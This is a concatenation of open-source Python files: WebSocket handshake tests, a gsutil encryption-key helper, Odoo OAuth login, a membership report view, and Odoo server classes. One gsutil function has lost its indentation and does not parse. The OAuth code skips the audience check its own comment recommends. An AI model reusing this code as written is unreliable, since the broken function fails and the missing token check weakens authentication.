                         request.connection.written_data())
        self.assertEqual('/demo', request.ws_resource)
        self.assertEqual('http://example.com', request.ws_origin)
        self.assertEqual('ws://example.com/demo', request.ws_location)
        self.assertEqual('sample', request.ws_protocol)

    def test_good_request_capitalized_header_values(self):
        # 'UPGRADE'/'WEBSOCKET' header values must be accepted
        # case-insensitively and produce the same response.
        request = _create_request(_GOOD_REQUEST_CAPITALIZED_HEADER_VALUES)
        handshaker = handshake.Handshaker(request,
                                          mock.MockDispatcher())
        handshaker.do_handshake()
        self.assertEqual(_GOOD_RESPONSE_DEFAULT_PORT,
                         request.connection.written_data())

    def test_good_request_secure_default_port(self):
        # HTTPS on port 443 must produce a wss:// location in the response.
        request = _create_request(_GOOD_REQUEST)
        request.connection.local_addr = ('0.0.0.0', 443)
        request.is_https_ = True
        handshaker = handshake.Handshaker(request,
                                          mock.MockDispatcher())
        handshaker.do_handshake()
        self.assertEqual(_GOOD_RESPONSE_SECURE,
                         request.connection.written_data())
        self.assertEqual('sample', request.ws_protocol)

    def test_good_request_nondefault_port(self):
        # A non-default port must appear in the Sec-WebSocket-Location.
        request = _create_request(_GOOD_REQUEST_NONDEFAULT_PORT)
        handshaker = handshake.Handshaker(request,
                                          mock.MockDispatcher())
        handshaker.do_handshake()
        self.assertEqual(_GOOD_RESPONSE_NONDEFAULT_PORT,
                         request.connection.written_data())
        self.assertEqual('sample', request.ws_protocol)

    def test_good_request_secure_non_default_port(self):
        # HTTPS on a non-default port: wss:// location including the port.
        request = _create_request(_GOOD_REQUEST_NONDEFAULT_PORT)
        request.is_https_ = True
        handshaker = handshake.Handshaker(request,
                                          mock.MockDispatcher())
        handshaker.do_handshake()
        self.assertEqual(_GOOD_RESPONSE_SECURE_NONDEF,
                         request.connection.written_data())
        self.assertEqual('sample', request.ws_protocol)

    def test_good_request_default_no_protocol(self):
        # Omitting Sec-WebSocket-Protocol is legal; ws_protocol stays None
        # and the response carries no protocol header.
        request = _create_request(_GOOD_REQUEST_NO_PROTOCOL)
        handshaker = handshake.Handshaker(request,
                                          mock.MockDispatcher())
        handshaker.do_handshake()
        self.assertEqual(_GOOD_RESPONSE_NO_PROTOCOL,
                         request.connection.written_data())
        self.assertEqual(None, request.ws_protocol)

    def test_good_request_optional_headers(self):
        # Unknown/optional headers (including empty-valued ones) must be
        # preserved untouched on the request.
        request = _create_request(_GOOD_REQUEST_WITH_OPTIONAL_HEADERS)
        handshaker = handshake.Handshaker(request,
                                          mock.MockDispatcher())
        handshaker.do_handshake()
        self.assertEqual('AValue',
                         request.headers_in['AKey'])
        self.assertEqual('',
                         request.headers_in['EmptyValue'])

    def test_good_request_with_nonprintable_key(self):
        # Key material containing non-printable bytes must still produce the
        # correct challenge response.
        request = _create_request(_GOOD_REQUEST_WITH_NONPRINTABLE_KEY)
        handshaker = handshake.Handshaker(request,
                                          mock.MockDispatcher())
        handshaker.do_handshake()
        self.assertEqual(_GOOD_RESPONSE_WITH_NONPRINTABLE_KEY,
                         request.connection.written_data())
        self.assertEqual('sample', request.ws_protocol)

    def test_bad_requests(self):
        # Every malformed request in _BAD_REQUESTS must be rejected with a
        # HandshakeException.
        for request in map(_create_request, _BAD_REQUESTS):
            handshaker = handshake.Handshaker(request,
                                              mock.MockDispatcher())
            self.assertRaises(HandshakeException, handshaker.do_handshake)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()


# vi:sts=4 sw=4 et
| bsd-3-clause |
BrandonY/gsutil | gslib/encryption_helper.py | 10 | 3614 | # -*- coding: utf-8 -*-
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper functions for customer-supplied encryption functionality."""
import base64
import binascii
from hashlib import sha256
import boto
from gslib.cloud_api import CryptoTuple
from gslib.exception import CommandException
_MAX_DECRYPTION_KEYS = 100
def CryptoTupleFromKey(crypto_key):
  """Returns a CryptoTuple matching the crypto key, or None for no key."""
  if not crypto_key:
    return None
  return CryptoTuple(crypto_key)
def FindMatchingCryptoKey(key_sha256):
  """Searches .boto config for an encryption key matching the SHA256 hash.

  Args:
    key_sha256: Base64-encoded string SHA256 hash of the AES256 encryption key.

  Returns:
    Base64-encoded encryption key string if a match is found, None otherwise.
  """
  # The primary encryption_key is checked first.
  candidate = boto.config.get('GSUtil', 'encryption_key', None)
  if candidate is not None:
    if Base64Sha256FromBase64EncryptionKey(candidate) == key_sha256:
      return candidate
  # Then decryption_key1 .. decryption_key100 in order.
  for key_number in range(1, _MAX_DECRYPTION_KEYS + 1):
    candidate = boto.config.get(
        'GSUtil', 'decryption_key%s' % str(key_number), None)
    if candidate is None:
      # Reading 100 config values can take ~1ms in testing. To avoid adding
      # this tax, stop reading keys as soon as we encounter a non-existent
      # entry (in lexicographic order).
      break
    if Base64Sha256FromBase64EncryptionKey(candidate) == key_sha256:
      return candidate
def GetEncryptionTuple():
  """Returns the encryption tuple from .boto configuration."""
  key = _GetBase64EncryptionKey()
  if not key:
    return None
  return CryptoTuple(key)
def GetEncryptionTupleAndSha256Hash():
  """Returns encryption tuple and SHA256 key hash from .boto configuration."""
  crypto_tuple = GetEncryptionTuple()
  key_hash = (Base64Sha256FromBase64EncryptionKey(crypto_tuple.crypto_key)
              if crypto_tuple else None)
  return (crypto_tuple, key_hash)
def Base64Sha256FromBase64EncryptionKey(encryption_key):
  """Returns the base64-encoded SHA256 digest of a base64-encoded key."""
  raw_key = base64.decodestring(encryption_key)
  digest_bytes = binascii.unhexlify(_CalculateSha256FromString(raw_key))
  # encodestring appends newlines; strip them to get one clean token.
  return base64.encodestring(digest_bytes).replace('\n', '')
def _CalculateSha256FromString(input_string):
sha256_hash = sha256()
sha256_hash.update(input_string)
return sha256_hash.hexdigest()
def _GetBase64EncryptionKey():
  """Reads the encryption key from .boto configuration.

  Returns:
    Base64-encoded encryption key string, or None if no encryption key exists
    in configuration.
  """
  key = boto.config.get('GSUtil', 'encryption_key', None)
  if not key:
    return key
  # Ensure the key has a valid encoding.
  try:
    base64.decodestring(key)
  except:
    raise CommandException(
        'Configured encryption_key is not a valid base64 string. Please '
        'double-check your configuration and ensure the key is valid and in '
        'base64 format.')
  return key
| apache-2.0 |
gsmartway/odoo | addons/auth_oauth/res_users.py | 157 | 4897 | import logging
import werkzeug.urls
import urlparse
import urllib2
import simplejson
import openerp
from openerp.addons.auth_signup.res_users import SignupError
from openerp.osv import osv, fields
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
class res_users(osv.Model):
    """res.users extended with OAuth single sign-on support.

    Users authenticated through an OAuth provider are matched on
    (oauth_provider_id, oauth_uid); the last validated access token is
    stored so it can double as a password in check_credentials().
    """
    _inherit = 'res.users'

    _columns = {
        # Provider this user signed in with (auth.oauth.provider record).
        'oauth_provider_id': fields.many2one('auth.oauth.provider', 'OAuth Provider'),
        # Provider-side identifier of the user (the validation's 'user_id').
        'oauth_uid': fields.char('OAuth User ID', help="Oauth Provider user_id", copy=False),
        # Last validated access token; accepted as a password below.
        'oauth_access_token': fields.char('OAuth Access Token', readonly=True, copy=False),
    }

    _sql_constraints = [
        ('uniq_users_oauth_provider_oauth_uid', 'unique(oauth_provider_id, oauth_uid)', 'OAuth UID must be unique per provider'),
    ]

    def _auth_oauth_rpc(self, cr, uid, endpoint, access_token, context=None):
        # Call an OAuth endpoint with the access token as a query parameter
        # and decode the JSON response.
        params = werkzeug.url_encode({'access_token': access_token})
        # Append with '&' if the endpoint already carries a query string.
        if urlparse.urlparse(endpoint)[4]:
            url = endpoint + '&' + params
        else:
            url = endpoint + '?' + params
        f = urllib2.urlopen(url)
        response = f.read()
        return simplejson.loads(response)

    def _auth_oauth_validate(self, cr, uid, provider, access_token, context=None):
        """ return the validation data corresponding to the access token """
        p = self.pool.get('auth.oauth.provider').browse(cr, uid, provider, context=context)
        validation = self._auth_oauth_rpc(cr, uid, p.validation_endpoint, access_token)
        if validation.get("error"):
            raise Exception(validation['error'])
        # Optionally enrich the validation payload with extra user data.
        if p.data_endpoint:
            data = self._auth_oauth_rpc(cr, uid, p.data_endpoint, access_token)
            validation.update(data)
        return validation

    def _auth_oauth_signin(self, cr, uid, provider, validation, params, context=None):
        """ retrieve and sign in the user corresponding to provider and validated access token
            :param provider: oauth provider id (int)
            :param validation: result of validation of access token (dict)
            :param params: oauth parameters (dict)
            :return: user login (str)
            :raise: openerp.exceptions.AccessDenied if signin failed

            This method can be overridden to add alternative signin methods.
        """
        try:
            # Look up an existing user bound to this provider/uid pair and
            # refresh its stored access token.
            oauth_uid = validation['user_id']
            user_ids = self.search(cr, uid, [("oauth_uid", "=", oauth_uid), ('oauth_provider_id', '=', provider)])
            if not user_ids:
                raise openerp.exceptions.AccessDenied()
            assert len(user_ids) == 1
            user = self.browse(cr, uid, user_ids[0], context=context)
            user.write({'oauth_access_token': params['access_token']})
            return user.login
        except openerp.exceptions.AccessDenied, access_denied_exception:
            # No matching user: fall back to signup, unless the caller
            # explicitly disabled user creation.
            if context and context.get('no_user_creation'):
                return None
            state = simplejson.loads(params['state'])
            token = state.get('t')
            oauth_uid = validation['user_id']
            # If the provider supplied no email, synthesize a stable login.
            email = validation.get('email', 'provider_%s_user_%s' % (provider, oauth_uid))
            name = validation.get('name', email)
            values = {
                'name': name,
                'login': email,
                'email': email,
                'oauth_provider_id': provider,
                'oauth_uid': oauth_uid,
                'oauth_access_token': params['access_token'],
                'active': True,
            }
            try:
                _, login, _ = self.signup(cr, uid, values, token, context=context)
                return login
            except SignupError:
                # Re-raise the original AccessDenied so callers see a
                # uniform failure mode.
                raise access_denied_exception

    def auth_oauth(self, cr, uid, provider, params, context=None):
        # Advice by Google (to avoid Confused Deputy Problem)
        # if validation.audience != OUR_CLIENT_ID:
        #   abort()
        # else:
        #   continue with the process
        access_token = params.get('access_token')
        validation = self._auth_oauth_validate(cr, uid, provider, access_token)
        # required check
        if not validation.get('user_id'):
            raise openerp.exceptions.AccessDenied()
        # retrieve and sign in user
        login = self._auth_oauth_signin(cr, uid, provider, validation, params, context=context)
        if not login:
            raise openerp.exceptions.AccessDenied()
        # return user credentials
        return (cr.dbname, login, access_token)

    def check_credentials(self, cr, uid, password):
        # Accept either the regular password or the stored OAuth access
        # token as credentials for this user.
        try:
            return super(res_users, self).check_credentials(cr, uid, password)
        except openerp.exceptions.AccessDenied:
            res = self.search(cr, SUPERUSER_ID, [('id', '=', uid), ('oauth_access_token', '=', password)])
            if not res:
                raise
| agpl-3.0 |
nuuuboo/odoo | addons/membership/report/report_membership.py | 313 | 5267 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp import tools
import openerp.addons.decimal_precision as dp
STATE = [
('none', 'Non Member'),
('canceled', 'Cancelled Member'),
('old', 'Old Member'),
('waiting', 'Waiting Member'),
('invoiced', 'Invoiced Member'),
('free', 'Free Member'),
('paid', 'Paid Member'),
]
class report_membership(osv.osv):
    '''Membership Analysis

    Read-only reporting model backed by the SQL view created in init():
    one row per (partner, membership product, membership period), with
    counters per membership-line state and pending/earned amounts.
    '''
    _name = 'report.membership'
    _description = __doc__
    # No table is created for this model: it is backed by the SQL view below.
    _auto = False
    _rec_name = 'start_date'
    _columns = {
        'start_date': fields.date('Start Date', readonly=True),
        'date_to': fields.date('End Date', readonly=True, help="End membership date"),
        'num_waiting': fields.integer('# Waiting', readonly=True),
        'num_invoiced': fields.integer('# Invoiced', readonly=True),
        'num_paid': fields.integer('# Paid', readonly=True),
        'tot_pending': fields.float('Pending Amount', digits_compute= dp.get_precision('Account'), readonly=True),
        'tot_earned': fields.float('Earned Amount', digits_compute= dp.get_precision('Account'), readonly=True),
        'partner_id': fields.many2one('res.partner', 'Member', readonly=True),
        'associate_member_id': fields.many2one('res.partner', 'Associate Member', readonly=True),
        'membership_id': fields.many2one('product.product', 'Membership Product', readonly=True),
        'membership_state': fields.selection(STATE, 'Current Membership State', readonly=True),
        'user_id': fields.many2one('res.users', 'Salesperson', readonly=True),
        'company_id': fields.many2one('res.company', 'Company', readonly=True),
        'quantity': fields.integer("Quantity", readonly=True),
    }

    def init(self, cr):
        '''Create the view

        The inner SELECT produces one row per (partner, membership line),
        flagging each line's state; the outer SELECT aggregates those rows
        per partner/product/period into the counters exposed above.
        '''
        tools.drop_view_if_exists(cr, 'report_membership')
        cr.execute("""
CREATE OR REPLACE VIEW report_membership AS (
SELECT
MIN(id) AS id,
partner_id,
count(membership_id) as quantity,
user_id,
membership_state,
associate_member_id,
membership_amount,
date_to,
start_date,
COUNT(num_waiting) AS num_waiting,
COUNT(num_invoiced) AS num_invoiced,
COUNT(num_paid) AS num_paid,
SUM(tot_pending) AS tot_pending,
SUM(tot_earned) AS tot_earned,
membership_id,
company_id
FROM
(SELECT
MIN(p.id) AS id,
p.id AS partner_id,
p.user_id AS user_id,
p.membership_state AS membership_state,
p.associate_member AS associate_member_id,
p.membership_amount AS membership_amount,
p.membership_stop AS date_to,
p.membership_start AS start_date,
CASE WHEN ml.state = 'waiting'  THEN ml.id END AS num_waiting,
CASE WHEN ml.state = 'invoiced' THEN ml.id END AS num_invoiced,
CASE WHEN ml.state = 'paid'     THEN ml.id END AS num_paid,
CASE WHEN ml.state IN ('waiting', 'invoiced') THEN SUM(il.price_subtotal) ELSE 0 END AS tot_pending,
CASE WHEN ml.state = 'paid' OR p.membership_state = 'old' THEN SUM(il.price_subtotal) ELSE 0 END AS tot_earned,
ml.membership_id AS membership_id,
p.company_id AS company_id
FROM res_partner p
LEFT JOIN membership_membership_line ml ON (ml.partner = p.id)
LEFT JOIN account_invoice_line il ON (ml.account_invoice_line = il.id)
LEFT JOIN account_invoice ai ON (il.invoice_id = ai.id)
WHERE p.membership_state != 'none' and p.active = 'true'
GROUP BY
p.id,
p.user_id,
p.membership_state,
p.associate_member,
p.membership_amount,
p.membership_start,
ml.membership_id,
p.company_id,
ml.state,
ml.id
) AS foo
GROUP BY
start_date,
date_to,
partner_id,
user_id,
membership_id,
company_id,
membership_state,
associate_member_id,
membership_amount
)""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
datenbetrieb/odoo | openerp/service/server.py | 17 | 37987 | #-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import random
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import unittest2
import werkzeug.serving
if os.name == 'posix':
# Unix only for workers
import fcntl
import resource
import psutil
else:
# Windows shim
signal.SIGHUP = -1
# Optional process names for workers
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import openerp
from openerp.modules.registry import RegistryManager
from openerp.release import nt_service_name
import openerp.tools.config as config
from openerp.tools import stripped_sys_argv, dumpstacks, log_ormcache_stats
_logger = logging.getLogger(__name__)

# Base polling period (seconds) shared by the cron threads and cron workers.
SLEEP_INTERVAL = 60  # 1 min
def memory_info(process):
    """Return the ``(rss, vms)`` pair for *process*, smoothing over the
    psutil API rename: psutil < 2.0 only exposes ``get_memory_info()``,
    psutil >= 3.0 only ``memory_info()``.
    """
    # Prefer the modern accessor name, fall back to the legacy one.
    getter = getattr(process, 'memory_info', None)
    if getter is None:
        getter = process.get_memory_info
    stats = getter()
    return (stats.rss, stats.vms)
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class LoggingBaseWSGIServerMixIn(object):
    """Mixin for the werkzeug WSGI servers below: route request-handling
    errors to the odoo logger instead of the default stderr traceback."""
    def handle_error(self, request, client_address):
        t, e, _ = sys.exc_info()
        if t == socket.error and e.errno == errno.EPIPE:
            # broken pipe, ignore error: the client disconnected early
            return
        _logger.exception('Exception happened during processing of request from %s', client_address)
class BaseWSGIServerNoBind(LoggingBaseWSGIServerMixIn, werkzeug.serving.BaseWSGIServer):
    """ werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
    use this class, sets the socket and calls the process_request() manually
    """
    def __init__(self, app):
        werkzeug.serving.BaseWSGIServer.__init__(self, "127.0.0.1", 0, app)
        # Directly close the socket. It will be replaced by WorkerHTTP when processing requests
        if self.socket:
            self.socket.close()

    def server_activate(self):
        # dont listen as we use PreforkServer#socket
        pass
class RequestHandler(werkzeug.serving.WSGIRequestHandler):
    """Request handler that renames the current thread after the request it
    serves, so thread dumps identify the HTTP handling threads."""
    def setup(self):
        # flag the current thread as handling a http request
        super(RequestHandler, self).setup()
        me = threading.currentThread()
        me.name = 'openerp.service.http.request.%s' % (me.ident,)
# _reexec() should set LISTEN_* to avoid connection refused during reload time. It
# should also work with systemd socket activation. This is currently untested
# and not yet used.
class ThreadedWSGIServerReloadable(LoggingBaseWSGIServerMixIn, werkzeug.serving.ThreadedWSGIServer):
    """ werkzeug Threaded WSGI Server patched to allow reusing a listen socket
    given by the environement, this is used by autoreload to keep the listen
    socket open when a reload happens.
    """
    def __init__(self, host, port, app):
        super(ThreadedWSGIServerReloadable, self).__init__(host, port, app,
                                                           handler=RequestHandler)

    def server_bind(self):
        # systemd-style socket activation: reuse the inherited listening fd
        # when the LISTEN_* environment variables target this process.
        envfd = os.environ.get('LISTEN_FDS')
        if envfd and os.environ.get('LISTEN_PID') == str(os.getpid()):
            self.reload_socket = True
            self.socket = socket.fromfd(int(envfd), socket.AF_INET, socket.SOCK_STREAM)
            # should we os.close(int(envfd)) ? it seem python duplicate the fd.
        else:
            self.reload_socket = False
            super(ThreadedWSGIServerReloadable, self).server_bind()

    def server_activate(self):
        # only listen() when we created the socket ourselves in server_bind()
        if not self.reload_socket:
            super(ThreadedWSGIServerReloadable, self).server_activate()
#----------------------------------------------------------
# AutoReload watcher
#----------------------------------------------------------
class AutoReload(object):
    """Watch the addons paths with pyinotify and restart the server whenever
    a ``.py`` or ``.xml`` file is created or modified (``--auto-reload``)."""
    def __init__(self, server):
        self.server = server
        # pathname -> 1, filled by the inotify handler, drained by check_thread()
        self.files = {}
        # module name -> 1, modules whose xml changed (consumed by start())
        self.modules = {}
        import pyinotify
        class EventHandler(pyinotify.ProcessEvent):
            def __init__(self, autoreload):
                self.autoreload = autoreload

            def process_IN_CREATE(self, event):
                _logger.debug('File created: %s', event.pathname)
                self.autoreload.files[event.pathname] = 1

            def process_IN_MODIFY(self, event):
                _logger.debug('File modified: %s', event.pathname)
                self.autoreload.files[event.pathname] = 1

        self.wm = pyinotify.WatchManager()
        self.handler = EventHandler(self)
        self.notifier = pyinotify.Notifier(self.wm, self.handler, timeout=0)
        mask = pyinotify.IN_MODIFY | pyinotify.IN_CREATE  # IN_MOVED_FROM, IN_MOVED_TO ?
        for path in openerp.modules.module.ad_paths:
            _logger.info('Watching addons folder %s', path)
            self.wm.add_watch(path, mask, rec=True)

    def process_data(self, files):
        """Restart when any changed .xml file belongs to an addon module."""
        xml_files = [i for i in files if i.endswith('.xml')]
        for i in xml_files:
            for path in openerp.modules.module.ad_paths:
                if i.startswith(path):
                    # find out wich addons path the file belongs to
                    # and extract it's module name
                    right = i[len(path) + 1:].split('/')
                    if len(right) < 2:
                        continue
                    module = right[0]
                    self.modules[module] = 1
        if self.modules:
            _logger.info('autoreload: xml change detected, autoreload activated')
            restart()

    def process_python(self, files):
        """Restart when changed .py files all compile; otherwise log errors."""
        # process python changes
        py_files = [i for i in files if i.endswith('.py')]
        py_errors = []
        # TODO keep python errors until they are ok
        if py_files:
            for i in py_files:
                try:
                    source = open(i, 'rb').read() + '\n'
                    compile(source, i, 'exec')
                except SyntaxError:
                    py_errors.append(i)
            if py_errors:
                _logger.info('autoreload: python code change detected, errors found')
                for i in py_errors:
                    _logger.info('autoreload: SyntaxError %s', i)
            else:
                _logger.info('autoreload: python code updated, autoreload activated')
                restart()

    def check_thread(self):
        # Check if some files have been touched in the addons path.
        # If true, check if the touched file belongs to an installed module
        # in any of the database used in the registry manager.
        while 1:
            while self.notifier.check_events(1000):
                self.notifier.read_events()
                self.notifier.process_events()
            l = self.files.keys()
            self.files.clear()
            self.process_data(l)
            self.process_python(l)

    def run(self):
        """Start the watcher loop in a daemon thread."""
        t = threading.Thread(target=self.check_thread)
        t.setDaemon(True)
        t.start()
        _logger.info('AutoReload watcher running')
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
    """Base class for the server flavours below; holds the shared
    configuration (WSGI app, bind interface/port, pid) and socket helpers."""
    def __init__(self, app):
        # TODO Change the xmlrpc_* options to http_*
        self.app = app
        # config
        self.interface = config['xmlrpc_interface'] or '0.0.0.0'
        self.port = config['xmlrpc_port']
        # runtime
        self.pid = os.getpid()

    def close_socket(self, sock):
        """ Closes a socket instance cleanly
        :param sock: the network socket to close
        :type sock: socket.socket
        """
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except socket.error, e:
            if e.errno == errno.EBADF:
                # Werkzeug > 0.9.6 closes the socket itself (see commit
                # https://github.com/mitsuhiko/werkzeug/commit/4d8ca089)
                return
            # On OSX, socket shutdowns both sides if any side closes it
            # causing an error 57 'Socket is not connected' on shutdown
            # of the other side (or something), see
            # http://bugs.python.org/issue4397
            # note: stdlib fixed test, not behavior
            if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
                raise
        sock.close()
class ThreadedServer(CommonServer):
    """Default server: a single process where the werkzeug HTTP server and
    the cron runners each live in their own daemon thread.  Shutdown and
    restart are driven by signals counted in ``quit_signals_received``."""
    def __init__(self, app):
        super(ThreadedServer, self).__init__(app)
        self.main_thread_id = threading.currentThread().ident
        # Variable keeping track of the number of calls to the signal handler defined
        # below. This variable is monitored by ``quit_on_signals()``.
        self.quit_signals_received = 0

        #self.socket = None
        self.httpd = None

    def signal_handler(self, sig, frame):
        if sig in [signal.SIGINT, signal.SIGTERM]:
            # shutdown on kill -INT or -TERM
            self.quit_signals_received += 1
            if self.quit_signals_received > 1:
                # logging.shutdown was already called at this point.
                sys.stderr.write("Forced shutdown.\n")
                os._exit(0)
        elif sig == signal.SIGHUP:
            # restart on kill -HUP
            openerp.phoenix = True
            self.quit_signals_received += 1

    def cron_thread(self, number):
        """Body of cron thread *number*: every SLEEP_INTERVAL(+number)
        seconds, acquire and run due jobs on every ready registry."""
        while True:
            time.sleep(SLEEP_INTERVAL + number)     # Steve Reich timing style
            registries = openerp.modules.registry.RegistryManager.registries
            _logger.debug('cron%d polling for jobs', number)
            for db_name, registry in registries.iteritems():
                while registry.ready:
                    try:
                        acquired = openerp.addons.base.ir.ir_cron.ir_cron._acquire_job(db_name)
                        if not acquired:
                            break
                    except Exception:
                        _logger.warning('cron%d encountered an Exception:', number, exc_info=True)
                        break

    def cron_spawn(self):
        """ Start the above runner function in a daemon thread.

        The thread is a typical daemon thread: it will never quit and must be
        terminated when the main process exits - with no consequence (the processing
        threads it spawns are not marked daemon).
        """
        # Force call to strptime just before starting the cron thread
        # to prevent time.strptime AttributeError within the thread.
        # See: http://bugs.python.org/issue7980
        datetime.datetime.strptime('2012-01-01', '%Y-%m-%d')
        for i in range(openerp.tools.config['max_cron_threads']):
            def target():
                self.cron_thread(i)
            t = threading.Thread(target=target, name="openerp.service.cron.cron%d" % i)
            t.setDaemon(True)
            t.start()
            _logger.debug("cron%d started!" % i)

    def http_thread(self):
        def app(e, s):
            return self.app(e, s)
        self.httpd = ThreadedWSGIServerReloadable(self.interface, self.port, app)
        self.httpd.serve_forever()

    def http_spawn(self):
        """Run the HTTP server loop in its own daemon thread."""
        t = threading.Thread(target=self.http_thread, name="openerp.service.httpd")
        t.setDaemon(True)
        t.start()
        _logger.info('HTTP service (werkzeug) running on %s:%s', self.interface, self.port)

    def start(self, stop=False):
        """Install signal handlers and spawn the HTTP/cron threads.

        :param stop: True in ``--stop-after-init`` mode; the cron threads
                     are then not started.
        """
        _logger.debug("Setting signal handlers")
        if os.name == 'posix':
            signal.signal(signal.SIGINT, self.signal_handler)
            signal.signal(signal.SIGTERM, self.signal_handler)
            signal.signal(signal.SIGCHLD, self.signal_handler)
            signal.signal(signal.SIGHUP, self.signal_handler)
            signal.signal(signal.SIGQUIT, dumpstacks)
            signal.signal(signal.SIGUSR1, log_ormcache_stats)
        elif os.name == 'nt':
            import win32api
            win32api.SetConsoleCtrlHandler(lambda sig: self.signal_handler(sig, None), 1)

        test_mode = config['test_enable'] or config['test_file']
        if test_mode or (config['xmlrpc'] and not stop):
            # some tests need the http deamon to be available...
            self.http_spawn()

        if not stop:
            # only relevant if we are not in "--stop-after-init" mode
            self.cron_spawn()

    def stop(self):
        """ Shutdown the WSGI server. Wait for non deamon threads.
        """
        _logger.info("Initiating shutdown")
        _logger.info("Hit CTRL-C again or send a second signal to force the shutdown.")

        if self.httpd:
            self.httpd.shutdown()
            self.close_socket(self.httpd.socket)

        # Manually join() all threads before calling sys.exit() to allow a second signal
        # to trigger _force_quit() in case some non-daemon threads won't exit cleanly.
        # threading.Thread.join() should not mask signals (at least in python 2.5).
        me = threading.currentThread()
        _logger.debug('current thread: %r', me)
        for thread in threading.enumerate():
            _logger.debug('process %r (%r)', thread, thread.isDaemon())
            if thread != me and not thread.isDaemon() and thread.ident != self.main_thread_id:
                while thread.isAlive():
                    _logger.debug('join and sleep')
                    # Need a busyloop here as thread.join() masks signals
                    # and would prevent the forced shutdown.
                    thread.join(0.05)
                    time.sleep(0.05)

        _logger.debug('--')
        openerp.modules.registry.RegistryManager.delete_all()
        logging.shutdown()

    def run(self, preload=None, stop=False):
        """ Start the http server and the cron thread then wait for a signal.

        The first SIGINT or SIGTERM signal will initiate a graceful shutdown while
        a second one if any will force an immediate exit.
        """
        self.start(stop=stop)

        rc = preload_registries(preload)

        if stop:
            self.stop()
            return rc

        # Wait for a first signal to be handled. (time.sleep will be interrupted
        # by the signal handler.) The try/except is for the win32 case.
        try:
            while self.quit_signals_received == 0:
                time.sleep(60)
        except KeyboardInterrupt:
            pass

        self.stop()

    def reload(self):
        # ask ourselves to restart: the SIGHUP handler sets openerp.phoenix
        os.kill(self.pid, signal.SIGHUP)
class GeventServer(CommonServer):
    """Evented (gevent) server dedicated to longpolling requests; runs as a
    separate process spawned by PreforkServer.long_polling_spawn()."""
    def __init__(self, app):
        super(GeventServer, self).__init__(app)
        self.port = config['longpolling_port']
        self.httpd = None

    def watch_parent(self, beat=4):
        """Greenlet body: terminate this process when its parent changes,
        i.e. when the prefork master process died."""
        import gevent
        ppid = os.getppid()
        while True:
            if ppid != os.getppid():
                pid = os.getpid()
                _logger.info("LongPolling (%s) Parent changed", pid)
                # suicide !!
                os.kill(pid, signal.SIGTERM)
                return
            gevent.sleep(beat)

    def start(self):
        import gevent
        from gevent.wsgi import WSGIServer

        if os.name == 'posix':
            signal.signal(signal.SIGQUIT, dumpstacks)
            signal.signal(signal.SIGUSR1, log_ormcache_stats)

        gevent.spawn(self.watch_parent)
        self.httpd = WSGIServer((self.interface, self.port), self.app)
        _logger.info('Evented Service (longpolling) running on %s:%s', self.interface, self.port)
        try:
            self.httpd.serve_forever()
        except:
            _logger.exception("Evented Service (longpolling): uncaught error during main loop")
            raise

    def stop(self):
        import gevent
        self.httpd.stop()
        gevent.shutdown()

    def run(self, preload, stop):
        self.start()
        self.stop()
class PreforkServer(CommonServer):
    """ Multiprocessing inspired by (g)unicorn.

    PreforkServer (aka Multicorn) currently uses accept(2) as dispatching
    method between workers but we plan to replace it by a more intelligent
    dispatcher to will parse the first HTTP request line.
    """
    def __init__(self, app):
        # config
        self.address = config['xmlrpc'] and \
            (config['xmlrpc_interface'] or '0.0.0.0', config['xmlrpc_port'])
        self.population = config['workers']
        self.timeout = config['limit_time_real']
        self.limit_request = config['limit_request']
        # working vars
        self.beat = 4
        self.app = app
        self.pid = os.getpid()
        self.socket = None
        self.workers_http = {}
        self.workers_cron = {}
        self.workers = {}
        self.generation = 0
        self.queue = []
        self.long_polling_pid = None

    def pipe_new(self):
        """Create a non-blocking, close-on-exec pipe used as wakeup channel
        between the signal handler / workers and the master select() loop."""
        pipe = os.pipe()
        for fd in pipe:
            # non_blocking
            flags = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
            fcntl.fcntl(fd, fcntl.F_SETFL, flags)
            # close_on_exec
            flags = fcntl.fcntl(fd, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
            fcntl.fcntl(fd, fcntl.F_SETFD, flags)
        return pipe

    def pipe_ping(self, pipe):
        """Write one byte into *pipe* to wake up the select() in sleep()."""
        try:
            os.write(pipe[1], '.')
        except IOError, e:
            if e.errno not in [errno.EAGAIN, errno.EINTR]:
                raise

    def signal_handler(self, sig, frame):
        # Defer the real work to process_signals() in the main loop.
        # SIGCHLD is always queued so dead children always get reaped.
        if len(self.queue) < 5 or sig == signal.SIGCHLD:
            self.queue.append(sig)
            self.pipe_ping(self.pipe)
        else:
            _logger.warn("Dropping signal: %s", sig)

